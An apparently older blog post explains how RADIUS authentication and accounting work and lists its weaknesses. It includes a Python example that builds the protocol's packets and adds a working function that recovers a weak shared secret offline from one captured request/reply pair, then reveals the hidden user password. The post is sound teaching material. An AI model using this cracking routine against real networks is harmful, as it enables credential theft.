09 Jun 08

Remote Access: (1) RADIUS

RADIUS (Remote Authentication Dial In User Service) is used to authenticate usernames and passwords. A RADIUS server can work alone or in a distributed (hierarchical) mode. In distributed RADIUS, the first server acts as a proxy and forwards the authentication request to an enterprise RADIUS server; this forwarding is called proxy RADIUS. It uses the same packet format, with a separate shared secret for each proxy-to-server hop.

Why is RADIUS popular? Because it supports:

  • Point-to-Point Protocol (PPP)
  • Password Authentication Protocol (PAP)
  • Challenge Handshake Authentication Protocol (CHAP)

RADIUS is a client/server protocol built around AAA (Authentication, Authorization, Accounting). RADIUS authentication consists of six steps:

1. The user initiates a connection with an ISP RAS or corporate RAS (in RADIUS terminology the RAS is the NAS, and it is the RADIUS client). Once the connection is established, the user is prompted for a username and password.

2. The RAS sends the credentials to the RADIUS server in an Access-Request packet over UDP. Only the password is hidden: the User-Password attribute is XORed with an MD5 keystream derived from the shared secret and the packet's random Request Authenticator (RFC 2865), while the username and all other attributes travel in cleartext.

3. The RADIUS server attempts to verify the user’s credentials against a centralized database.

4. If the credentials match those found in the database, the server responds with an Access-Accept message. If the username does not exist or the password is incorrect, the server responds with an Access-Reject message. It responds with an Access-Challenge message if the information is insufficient for authentication (for example when a one-time token is required), and the client then sends a new Access-Request carrying the answer to the challenge.

5. The RAS verifies the reply's Response Authenticator (an MD5 over the reply and the shared secret, which is what stops a forged Access-Accept from being honoured), then admits or refuses the user and applies any authorization attributes returned in the Access-Accept.

6. The RAS then sends the RADIUS server Accounting-Request messages (Acct-Status-Type Start when the session begins and Stop when it ends, together with the session identifier and usage counters). The server acknowledges each one with an Accounting-Response.

RADIUS vulnerabilities

Buffer overflow: the Multiple Vendor RADIUS Digest Calculation Buffer Overflow Vulnerability, in which several vendors' implementations overran a fixed-size buffer while computing the packet digest. The general defence is to validate every attribute length against the packet length before any digest is calculated.

UDP: since UDP is connectionless, delivery is not guaranteed (a request can be dropped at any time without notice, so clients must retransmit), and RADIUS has no replay protection of its own, so a captured Access-Request can be replayed. Because the Response Authenticator is just an MD5 over the packet and the shared secret, anyone who captures a request/response pair can also run an offline dictionary attack against a weak shared secret, and with the secret recovered can unhide every User-Password on the wire.
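The six-step exchange above and the shared-secret weakness just described, as one added example (not code from the original post). It implements the RFC 2865 password hiding, the Access-Request / Access-Accept exchange with Response Authenticator checking, the RFC 2866 Accounting-Request, and an offline dictionary attack on the shared secret from a captured pair. The usernames, passwords, secret and wordlist are constructed sample data, and packets are built in memory rather than sent over UDP:

```python
# Added example (not code from the original post): RADIUS Access-Request / Access-Accept
# and Accounting-Request per RFC 2865 / RFC 2866, plus an offline dictionary attack.
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3  # RFC 2865 packet codes
ACCOUNTING_REQUEST, ACCOUNTING_RESPONSE = 4, 5          # RFC 2866 packet codes
USER_NAME, USER_PASSWORD, ACCT_STATUS_TYPE, ACCT_START = 1, 2, 40, 1

def _pw_stream(data, secret, req_auth, decrypt):
    # RFC 2865 s5.2: XOR each 16-byte block with MD5(secret + previous block),
    # seeded with the Request Authenticator. Obfuscation, not authenticated encryption.
    out, prev = b"", req_auth
    for i in range(0, len(data), 16):
        blk = data[i:i + 16]
        res = bytes(x ^ y for x, y in zip(blk, hashlib.md5(secret + prev).digest()))
        out, prev = out + res, (blk if decrypt else res)
    return out

def hide_password(password, secret, req_auth):
    return _pw_stream(password + b"\x00" * (-len(password) % 16), secret, req_auth, False)

def reveal_password(hidden, secret, req_auth):
    return _pw_stream(hidden, secret, req_auth, True).rstrip(b"\x00")  # strip NUL padding

def attr(t, value):
    return struct.pack("!BB", t, len(value) + 2) + value  # Type, Length (incl. header), Value

def parse_attrs(data):
    attrs, i = {}, 0
    while i < len(data):
        ln = data[i + 1] if i + 1 < len(data) else 0
        if ln < 2 or i + ln > len(data):  # bounds-check before anything touches the bytes
            raise ValueError("malformed attribute")
        attrs[data[i]] = data[i + 2:i + ln]
        i += ln
    return attrs

def packet(code, ident, authenticator, attrs):
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs

def authenticator_for(code, ident, req_auth, attrs, secret):
    # MD5(Code + ID + Length + RequestAuth + Attributes + Secret): the Response
    # Authenticator; with 16 zero bytes as req_auth it is also the Accounting-Request one.
    return hashlib.md5(struct.pack("!BBH", code, ident, 20 + len(attrs)) + req_auth + attrs + secret).digest()

def access_request(user, password, secret, ident, req_auth=None):
    # Step 2: the RAS/NAS hides only the password; the username travels in clear.
    req_auth = req_auth or os.urandom(16)  # must be fresh and unpredictable per request
    attrs = attr(USER_NAME, user) + attr(USER_PASSWORD, hide_password(password, secret, req_auth))
    return packet(ACCESS_REQUEST, ident, req_auth, attrs)

def accounting_start(user, secret, ident):
    # Step 6: Accounting-Request (Acct-Status-Type = Start), authenticated with the secret.
    attrs = attr(USER_NAME, user) + attr(ACCT_STATUS_TYPE, struct.pack("!I", ACCT_START))
    auth = authenticator_for(ACCOUNTING_REQUEST, ident, b"\x00" * 16, attrs, secret)
    return packet(ACCOUNTING_REQUEST, ident, auth, attrs)

def serve(request, secret, users):
    # Steps 3-4: verify credentials and answer Accept/Reject (or acknowledge accounting).
    code, ident, length = struct.unpack("!BBH", request[:4])
    if length != len(request) or length < 20:
        raise ValueError("bad packet length")
    req_auth, attrs = request[4:20], parse_attrs(request[20:])
    if code == ACCESS_REQUEST:
        pw = reveal_password(attrs.get(USER_PASSWORD, b""), secret, req_auth)
        reply = ACCESS_ACCEPT if users.get(attrs.get(USER_NAME)) == pw else ACCESS_REJECT
    elif code == ACCOUNTING_REQUEST:
        expected = authenticator_for(code, ident, b"\x00" * 16, request[20:], secret)
        if not hmac.compare_digest(expected, req_auth):
            raise ValueError("accounting request failed authentication")
        reply = ACCOUNTING_RESPONSE
    else:
        raise ValueError("unsupported code")
    return packet(reply, ident, authenticator_for(reply, ident, req_auth, b"", secret), b"")

def check_reply(reply, request, secret):
    # Step 5: the NAS must verify the Response Authenticator before trusting the code.
    code, ident, length = struct.unpack("!BBH", reply[:4])
    if ident != request[1] or length != len(reply):
        return None
    expected = authenticator_for(code, ident, request[4:20], reply[20:], secret)
    return code if hmac.compare_digest(expected, reply[4:20]) else None

def crack_shared_secret(request, reply, wordlist):
    # Vulnerability: the Response Authenticator is MD5 over public bytes plus the
    # secret, so a captured pair allows offline guessing with no server interaction.
    code, ident, _ = struct.unpack("!BBH", reply[:4])
    for candidate in wordlist:
        if authenticator_for(code, ident, request[4:20], reply[20:], candidate) == reply[4:20]:
            return candidate
    return None

if __name__ == "__main__":
    secret, users = b"radiuspw", {b"alice": b"hunter2"}  # constructed sample data
    req = access_request(b"alice", b"hunter2", secret, ident=1)
    rep = serve(req, secret, users)
    print("access reply code:", check_reply(rep, req, secret))  # 2 = Access-Accept
    found = crack_shared_secret(req, rep, [b"password", b"secret", b"radiuspw"])
    print("recovered secret:", found, "password:", reveal_password(parse_attrs(req[20:])[USER_PASSWORD], found, req[4:20]))
```

The attack function never talks to the server: everything it needs is in the two captured packets, which is why a long random shared secret and a transport such as IPsec or RADIUS over TLS matter more than the password hiding itself.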


1 Response to “Remote Access: (1) RADIUS”


  1. December 25, 2010 at 11:50 pm

    How can I install it on CentOS? Is there a tutorial for that?
    Thanks,

